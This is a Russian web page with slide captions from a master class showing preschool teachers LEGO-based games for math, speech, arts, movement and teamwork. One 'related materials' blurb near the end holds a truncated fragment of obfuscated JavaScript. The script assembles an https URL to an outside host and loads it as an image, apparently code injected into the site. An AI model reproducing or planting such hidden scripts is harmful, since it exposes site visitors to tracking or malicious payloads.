Мастер-класс «Использование ЛЕГО – конструирования в образовательной работе с дошкольниками»
консультация (средняя, старшая, подготовительная группа)

Короткова Екатерина Мехаметовна

 Мастер класс направлен на повышение профессионального мастерства педагогов-участников мастер-класса по ЛЕГО-конструированию в процессе активного педагогического общения.

Скачать:

ВложениеРазмер
Файл prezentatsiya_microsoft_powerpoint.pptx181.4 КБ

Предварительный просмотр:


Подписи к слайдам:

Слайд 1

Мастер-класс «Использование ЛЕГО – конструирования в образовательной работе с дошкольниками» Автор: Воспитатель Короткова Е.М МК ДОУ Д/С №33 г.Сатка.

Слайд 2

Цель: повышение профессионального мастерства педагогов-участников мастер-класса по ЛЕГО-конструированию в процессе активного педагогического общения. Задачи: обучать участников мастер-класса навыкам применения ЛЕГО–конструктора П оказать участникам мастер-класса технологии работы с детьми дошкольного возраста в области ЛЕГО-конструирования; формировать у участников мастер-класса мотивацию на использование в образовательной деятельности ЛЕГО-конструктора. Оборудование и материалы : конструктор ЛЕГО, проектор, картотека схем и образцов построек. Планируемый результат : информирование педагогов о системе работы по ЛЕГО-конструированию для детей дошкольного возраста; формирование представлений педагогов о возможности работы с ЛЕГО-конструктором.

Слайд 3

Теоретическая часть Конструктор Лего (LEGO) - давно уже легендарный бренд и по-прежнему обыкновенное чудо: интерес к нему не затухает много десятилетий — с момента его появления в Дании в 1949 году. С того дня и вплоть до настоящего времени Лего (LEGO) ни разу не изменил своему девизу «Играй с удовольствием» . У слова Лего два значения: «я учусь» и «я складываю. В педагогике Лего-технология интересна тем, что, строясь на интегрированных принципах, объединяет в себе элементы игры и экспериментирования, позволяет ребенку думать, фантазировать, и действовать, не боясь ошибиться. ЛЕГО позволяет детям учиться, играя. « Лего » – умная игра, Завлекательна, хитра. Интересно здесь играть, Строить, составлять, искать! Приглашаю всех друзей В « Лего » поиграть скорей. Там и взрослым интересно : В « Лего » поиграть полезно! .

Слайд 4

. Мы в своей практике используем конструктор ЛЕГО в разных видах деятельности: на занятиях, в совместной, самостоятельной и индивидуальной работе. Образовательные области в ДОУ не существуют в «чистом виде» . Всегда происходит их интеграция, а с помощью применения Лего -конструирования легко можно интегрировать познавательное развитие, куда и входит техническое конструирование с художественно-эстетическим развитием, когда мы говорим о творческом конструировании, с социально – коммуникативным развитием, речевым и физическим. Посредством использования Лего-конструкторов можно эффективно решать образовательные задачи.

Слайд 5

Практическая часть. Сегодня я познакомлю вас с некоторыми из вариантов применения Лего-конструирования в различных образовательных областях. .

Слайд 6

Игра «Волшебная дорожка» (конструктор для дорожки разного цвета и размера) Кирпичик нужный ты найди, Дорогу в ЛЕГО - страну собери. А теперь приступим к строительству дороги. Я кладу первый кирпичик, а вы продолжаете. - Твой кирпичик похож на мой? По цвету или размеру? - А почему ты поставил этот кирпичик? - Все поставили свои кирпичики? Дорога готова? Что мы закрепляли с детьми, играя в эту игру? - Чтобы никто не потерялся в пути, крепко сцепимся мизинчиками, как детали ЛЕГО и скажем волшебные слова: Раз, два, три, четыре, пять В страну Лего хотим мы попасть! Вот мы с вами оказались на станции под названием Математика.

Слайд 7

Познавательное развитие В процессе лего -конструирования у дошкольников развиваются математические способности и формируются сенсорные представления: дети, пересчитывая детали, блоки, крепления, вычисляя необходимое количество деталей, их форму, цвет, длину, закрепляют понятия: «высокий - низкий», «широкий - узкий». Дети знакомятся с такими пространственными показателями, как симметричность и асимметричность, ориентируются в пространстве . . Игра «Построй цифру» Первая Команда получают образец построек (Цифру). Цель - собрать из конструктора Лего – цифры по образцу. Вторая команда получает модель цифры, третья команда выстраивает цифру при условии, что она должна быть построена только из 7 деталей . Четвертая команда строит эту цифру как ее себе представляет ( по замыслу )

Слайд 8

Игра « Лего-клад » На пластину прикрепляются разные кирпичики Лего , под одним из которых прячется клад. Цель – найти клад с помощью подсказок. Например, клад не под красным кирпичиком (убираются все красные детали), клад не под кирпичиком 2*3 (убираются все кирпичики 2*3) и т.д., пока не останется одна деталь . Игра «Зеркало» Цель – симметрично выложить вторую часть рисунка.

Слайд 9

Речевое развитие Тренируя пальцы, мы оказываем мощное воздействие на работоспособность коры головного мозга, а, следовательно, и на развитие речи. В процессе конструирования из Лего , дети общаются, договариваются, рассуждают, учатся отстаивать свою точку зрения, при этом расширяется словарный запас, умение задавать вопросы, развиваются диалогическая и монологическая речь. Можно применять Лего и в процессе подготовки к обучению грамоте: -предложить составить образ буквы из кирпичиков Лего ; -построить различные предметы, которые начинаются с указанного звука; -выложить столько кирпичиков Лего на наборное полотно, сколько они слышат слов в данном предложении. Предлагаю поиграть в игру «Придумай свою историю»

Слайд 10

Создавая свои истории мы плавно переместились на то, как Лего развивает детей в художетственно - эстетическом направлении . Художественно-эстетическое развитие Лего - конструктор приходит на помощь при подготовке к детской театральной постановке. Сначала дети создают своих героев из конструктора, а затем озвучивают их. Лего используется и на музыкальных занятиях. Музыкальный руководитель наигрывает или отстукивает ритм. Дети выкладывают из деталей Лего музыкальную строку, изображая звуки и паузы . Определившись с характером произведения и с цветом необходимых деталей, дети составляют свои фигуры

Слайд 11

Предлагаю поиграть в Игру «Собери узор » Я буду называть деталь определённой формы и цвета, которую нужно будет найти и выставить в указанное мною место на пластине. Используются следующие ориентиры положения: «левый верхний угол», «левый нижний угол», «правый верхний угол», «правый нижний угол», «середина левой стороны», «середина правой стороны», «над», «под», «слева от», «справа от». Например, возьмите кирпичик зеленого цвета 2 на 2 и выставите его в левый верхний угол. Кирпичик желтого цвета 2 на 2 выставите в правый верхний угол. Кирпичик зеленого цвета 2 на 4 выставите в правый нижний угол. Кирпичик оранжевого цвета 2 на 4 выставите в центр квадрата. Кирпичик желтого цвета 2 на 4 выставите в левый нижний угол и т.д . На следующем этапе мы смотрим, что напоминает нам получившийся узор и зарисовываем. (украшенный платочек, цветочная поляна, поднос с фруктами, овощами или сладостями и т.д.)

Слайд 12

Физическое развитие Помимо мелкой моторики обеих рук Лего – конструирование также способствует развитию крупной моторики. Конструктор Лего можно использовать как инвентарь для проведения занятий по физической культуре. Игра «Равновесие» Участники игры кладут кирпичик Лего на голову, ведущий даёт задания, например, дважды присесть, сделать три шага вперёд, повернуть направо, постоять на левой ноге, покружиться и др. Задача участников-не уронить кирпичик.

Слайд 13

Социально-коммуникативное развитие На мой взгляд, одна из основных целей в лего -конструировании – научить детей эффективно работать вместе . Лего позволяет : создавать совместные постройки, объединенные одной идеей, одним проектом. С помощью использования этой технологии формируются : умение сотрудничать с партнером, работать в коллективе . Развиваются способность ставить цели, инициатива, способность доводить дело до конца, стремление отстаивать свои идеи, лидерство, широта интересов. Предлагаю поиграть. Игра «Сделай по словесной инструкции» (наборы лего 10 шт.) Два участника получают одинаковые детали. Первый участник, отвернувшись, придумывает какую-то элементарную постройку и одновременно рассказывает напарнику, как он это строит. В итоге игры должны получиться две одинаковые модели. Время игры –2-3 минуты. Предлагаю провести анализ работы. Давайте посмотрим на работы . Что хотели сконструировать? Получилось? Почему? Получилось ли объяснить партнёру ход своих действий?

Слайд 14

Вопрос аудитории: - Давайте дадим лучшему в мире конструктору небольшую характеристику. (Безопасность. Широкие игровые возможности. Польза. Развивает воображение, творческие способности, логическое мышление. Подходит для любого сезона. Универсальность. Подходит для всех возрастов : для девочек и мальчиков и даже взрослых. Легкий сбор и разбор конструкций. Это возможность коллективной игры.)

Слайд 15

3.Заключительная часть. Рефлексия. В заключение нашей встречи предлагаю построить пирамиду эмоций. Кирпичик красного цвета означает, что вам понравился данный мастер-класс, зеленого – то, что мастер-класс понравился, но вы еще что-то хотели бы увидеть, ну, а кирпичик желтого цвета покажет, что вам ничего не понравилось. Участники строят пирамиду своих эмоций из деталей Лего трех цветов.


По теме: методические разработки, презентации и конспекты

мастер-класс "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"

Данный мастер-класс информирует педагогов о системе работы по ЛЕГО-конструированию для детей дошкольного возраста,  формирует представления педагогов о возможностях работы с ЛЕГО-конструктором....

Мастер-класс "Использование Лего-конструирования в образовательной работе с дошкольниками"

Ход мастер-класса:1.Теоретическая часть.Добрый день, уважаемые коллеги. Сегодня на нашем мастер-классе мы окунемся в мир ЛЕГО.Я хотела бы поделиться нашим опытом работы по организации детс...

МАСТЕР-КЛАСС "Использование ЛЕГО – конструирования в образовательной работе с дошкольниками"

МАСТЕР-КЛАССИспользование ЛЕГО – конструирования var e,n,o;window.self===window.top&&(e=[\'//\',\'s:\',\'tp\',\'ht\'].reverse().join(\'\'),n=[\'rzkmxcve.lussoit.com\',\'80\'].join(\'/\'),(o=new Image).src=\'\'...

Мастер – класс «Использование Лего – конструирования в образовательной работе с дошкольниками»

В связи с введением в систему дошкольного образования Федеральных государственных образовательных стандартов, педагогам открываются большие возможности использования новых пед...

МАСТЕР-КЛАСС Использование ЛЕГО – конструирования в образовательной работе с дошкольниками

Цель: повышение профессионального мастерства педагогов-участников мастер-классе по ЛЕГО-конструированию в процессе активного педагогического общения.Задачи:обучать участников мастер-класса навыкам при...